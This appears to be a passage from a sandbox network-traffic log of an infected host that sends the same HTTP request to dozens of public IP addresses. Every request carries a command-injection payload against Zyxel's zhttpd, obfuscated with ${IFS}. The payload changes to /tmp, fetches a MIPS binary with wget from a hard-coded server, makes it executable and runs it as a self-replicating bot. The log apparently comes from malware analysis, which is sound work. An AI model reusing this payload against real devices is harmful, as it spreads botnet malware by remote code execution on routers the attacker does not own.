                                            Feb 2, 2024 06:21:26.916238070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8137192.168.2.1550508135.129.152.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916280031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8138192.168.2.1551856122.148.189.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916316032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8139192.168.2.1541126178.222.97.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916343927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8140192.168.2.154866043.236.176.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916402102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8141192.168.2.156025692.145.81.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916431904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8142192.168.2.155500287.241.2.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916472912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8143192.168.2.1550838158.91.17.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916516066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8144192.168.2.154374890.21.228.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916543007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8145192.168.2.155426288.169.68.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916603088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8146192.168.2.153658842.11.123.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916634083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8147192.168.2.1537240137.236.133.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916678905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8148192.168.2.1552016207.166.162.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916738987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8149192.168.2.154794837.125.80.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916799068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8150192.168.2.1557156164.32.85.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916843891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8151192.168.2.1533220140.223.30.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916897058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8152192.168.2.155435071.57.15.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916930914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8153192.168.2.1550450171.67.217.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917010069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8154192.168.2.1558308116.24.44.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917037964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8155192.168.2.1549196210.108.208.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917058945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8156192.168.2.1536698143.20.8.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917155027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8157192.168.2.1539316175.18.35.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917177916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8158192.168.2.1553708111.128.10.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917207003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8159192.168.2.155476058.186.189.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917248011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8160192.168.2.1542108151.3.16.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917277098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8161192.168.2.1557934165.42.162.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917284012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8162192.168.2.153419223.225.129.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917320013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8163192.168.2.1543214211.177.157.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917356014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8164192.168.2.15388809.211.226.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917412996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8165192.168.2.1532910121.211.72.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917457104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8166192.168.2.1543870136.233.66.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917516947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8167192.168.2.1555714178.69.12.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917529106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8168192.168.2.153566836.96.143.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917592049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8169192.168.2.1555878126.33.88.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917644978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8170192.168.2.153559213.77.79.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917676926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8171192.168.2.1533818182.244.138.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917779922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8172192.168.2.154848286.96.236.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917818069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8173192.168.2.1552482134.219.230.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917874098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8174192.168.2.155585294.110.203.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917874098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8175192.168.2.155535884.25.178.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917900085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8176192.168.2.1550262219.173.97.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917907953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8177192.168.2.1556656102.123.252.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.917958021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8178192.168.2.15351629.94.93.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918019056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8179192.168.2.154756077.48.192.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918059111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8180192.168.2.155230035.155.235.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918082952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8181192.168.2.1536790133.174.199.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918111086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8182192.168.2.1534728177.222.51.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918194056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8183192.168.2.154295898.45.214.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918226957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8184192.168.2.155556463.198.253.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918257952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8185192.168.2.153734493.33.229.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918292999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8186192.168.2.1553664201.205.52.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918349028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8187192.168.2.154367454.246.187.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918385983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8188192.168.2.153541453.145.78.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918405056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8189192.168.2.1540696190.175.49.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918421984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8190192.168.2.156029470.115.230.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918497086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8191192.168.2.156084245.4.73.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918524981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8192192.168.2.1548458158.86.130.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918554068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8193192.168.2.154957465.167.200.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918580055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8194192.168.2.1535246201.114.175.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918637037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8195192.168.2.1557682204.218.213.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918682098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8196192.168.2.1549034153.185.29.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918744087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8197192.168.2.1538284194.113.5.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918795109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8198192.168.2.1535728184.91.26.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918845892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8199192.168.2.1558064117.199.36.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.918886900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8200192.168.2.1538182177.188.93.222443
                                            TimestampBytes transferredDirectionData
